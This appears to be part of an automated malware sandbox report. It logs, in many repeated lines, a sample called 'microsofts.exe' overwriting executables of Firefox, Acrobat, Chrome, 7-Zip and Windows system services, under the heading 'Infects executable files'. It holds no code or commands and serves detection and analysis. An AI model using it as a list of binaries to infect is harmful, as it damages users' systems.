Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
